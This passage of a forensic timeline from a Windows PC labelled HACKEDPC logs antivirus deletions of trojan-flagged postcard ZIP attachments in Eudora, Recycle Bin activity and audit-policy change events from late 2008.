C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive11/12/08 7:37:54 Deleted postcard3.zip C:\program files\qualcomm\eudora\attach\postcard3.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/12/08 7:37:59 Deleted postcard3.zip C:\program files\qualcomm\eudora\attach\postcard3.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/12/08 7:38:00 accessed postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive11/12/08 7:38:00 written postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:28:32 created postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:28:32 Deleted postcard4.zip C:\program files\qualcomm\eudora\attach\postcard4.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/13/08 7:28:35 accessed postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:28:35 written postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:59:28 deleted postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:59:28 modified postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:59:30 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:59:30 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: smith.99999; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x18CEA)EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: smith.99999; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x18CEA)
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: HACKEDPC$; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x3E7)EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: smith.99999; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x18CEA)EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: smith.99999; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x18CEA)
![Page 5: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/5.jpg)
11/13/08 7:59:31 deleted postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:59:31 modified postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:59:32 deleted postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:59:32 modified postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:59:33 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 7:59:33 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/13/08 9:30:54 created PSCT8500.EXE-0492DFC4.pf C:\WINDOWS\Prefetch\PSCT8500.EXE-0492DFC4.pf11/13/08 10:29:54 Deleted postcard.zip C:\Program Files\Qualcomm\Eudora\attach\postcard.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/13/08 11:29:53 Deleted postcard.zip C:\Program Files\Qualcomm\Eudora\attach\postcard.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/14/08 7:32:25 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/14/08 7:32:25 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/14/08 7:32:25 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/14/08 13:42:06 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/14/08 16:19:05 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/17/08 7:17:57 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/17/08 7:18:02 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/18/08 8:01:09 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/18/08 8:01:10 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/18/08 8:01:14 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/18/08 8:01:14 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/18/08 8:01:14 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/18/08 14:59:22 accessed postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive11/18/08 14:59:22 created postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive11/18/08 14:59:22 written postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive11/19/08 7:41:40 accessed postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive11/19/08 7:41:40 created postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive11/19/08 7:41:40 written postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive11/20/08 7:31:26 accessed postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive11/20/08 7:31:26 created postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive11/20/08 7:31:26 written postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive11/20/08 7:31:27 Deleted postcard5.zip C:\Program Files\Qualcomm\Eudora\attach\postcard5.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/21/08 7:56:03 accessed postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive11/21/08 7:56:03 accessed postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive11/21/08 7:56:03 created postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive11/21/08 7:56:03 created postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive11/21/08 7:56:03 written postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive11/21/08 7:56:03 written postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive11/24/08 7:53:52 Deleted postcard7.zip C:\Program Files\Qualcomm\Eudora\attach\postcard7.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/24/08 16:56:01 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/24/08 16:56:01 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/25/08 16:48:42 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/25/08 16:48:42 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/26/08 7:43:08 accessed A0061054.ini C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\A0061054.iniInitialization Windows File, Deleted, Overwritten, Archive, Compressed, Not Indexed11/26/08 7:43:08 modified A0061054.ini C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\A0061054.iniInitialization Windows File, Deleted, Overwritten, Archive, Compressed, Not Indexed11/26/08 7:43:08 written A0061054.ini C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\A0061054.iniInitialization Windows File, Deleted, Overwritten, Archive, Compressed, Not Indexed11/26/08 8:03:43 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/26/08 8:03:43 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/26/08 8:03:43 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/26/08 8:03:44 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/26/08 8:03:45 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/26/08 8:03:45 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/26/08 11:31:12 accessed _REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005File, Deleted, Overwritten, Hidden, Archive, Compressed, Not Indexed11/26/08 11:31:12 modified _REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005File, Deleted, Overwritten, Hidden, Archive, Compressed, Not Indexed12/01/08 7:34:56 accessed postcard7.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard7.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 7:34:56 created postcard7.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard7.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 7:34:56 written postcard7.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard7.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 7:34:57 accessed postcard8.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard8.zip ZIP Compressed Archive File, Recycled, Archive12/01/08 7:34:57 created postcard8.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard8.zip ZIP Compressed Archive File, Recycled, Archive12/01/08 7:34:57 written postcard8.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard8.zip ZIP Compressed Archive File, Recycled, Archive12/01/08 11:24:28 accessed postcard9.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard9.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 11:24:28 created postcard9.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard9.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 11:24:28 written postcard9.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard9.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:53 deleted postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:53 deleted postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:53 modified postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:53 modified postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 deleted postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 deleted postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 modified postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 modified postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/02/08 10:21:15 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/02/08 10:21:15 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/02/08 10:21:15 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/02/08 16:31:20 deleted postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/02/08 16:31:20 modified postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 7:38:22 accessed postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 7:38:22 created postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 7:38:22 written postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 8:55:19 accessed postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 8:55:19 created postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 8:55:19 written postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 11:38:08 accessed postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 11:38:08 created postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 11:38:08 written postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 16:31:07 deleted postcard7.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard7.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 16:31:07 modified postcard7.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard7.zip ZIP Compressed Archive Match File, Recycled, Archive12/05/08 11:12:40 accessed postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/05/08 11:12:40 created postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/05/08 11:12:40 written postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/08/08 16:34:26 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/08/08 16:34:26 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/08/08 16:34:27 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/08/08 16:34:27 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/09/08 12:35:17 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/09/08 12:35:17 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/09/08 12:35:17 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:32 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:32 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:32 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:34 accessed postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:34 created postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:34 written postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 16:10:54 deleted postcard9.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard9.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 16:10:54 modified postcard9.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard9.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 16:10:55 deleted postcard8.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard8.zip ZIP Compressed Archive File, Recycled, Archive12/11/08 16:10:55 modified postcard8.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard8.zip ZIP Compressed Archive File, Recycled, Archive
12/12/08 15:45:56 accessed Mike.mbx C:\Program Files\Qualcomm\Eudora\Mike.mbx12/12/08 15:58:43 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/12/08 15:58:43 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
![Page 6: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/6.jpg)
12/15/08 8:36:22 created WINWORD.EXE-33AEA629.pf C:\WINDOWS\Prefetch\WINWORD.EXE-33AEA629.pf12/15/08 9:35:04 accessed Previous search.mbx C:\Program Files\Qualcomm\Eudora\Previous search.mbx
12/15/08 11:28:19 modified postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/15/08 11:28:20 deleted postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/15/08 11:28:20 deleted postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/15/08 11:28:20 modified postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/15/08 11:28:21 deleted postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/15/08 11:28:21 modified postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/16/08 10:00:25 deleted postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/16/08 10:00:25 modified postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/17/08 8:21:18 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/17/08 8:21:18 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/17/08 8:21:18 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/18/08 16:33:01 deleted postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/18/08 16:33:01 modified postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/19/08 15:33:40 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/19/08 15:33:40 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/22/08 7:35:05 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/22/08 7:35:05 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/22/08 7:35:05 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/22/08 16:25:08 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/22/08 16:25:08 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/23/08 7:54:50 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/23/08 7:54:50 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/23/08 7:54:50 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive01/05/09 8:15:17 created postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive File, Recycled, Archive01/05/09 8:15:19 accessed postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive File, Recycled, Archive01/05/09 8:15:19 written postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive File, Recycled, Archive01/05/09 16:55:57 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive01/05/09 16:55:57 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive01/05/09 16:55:58 deleted 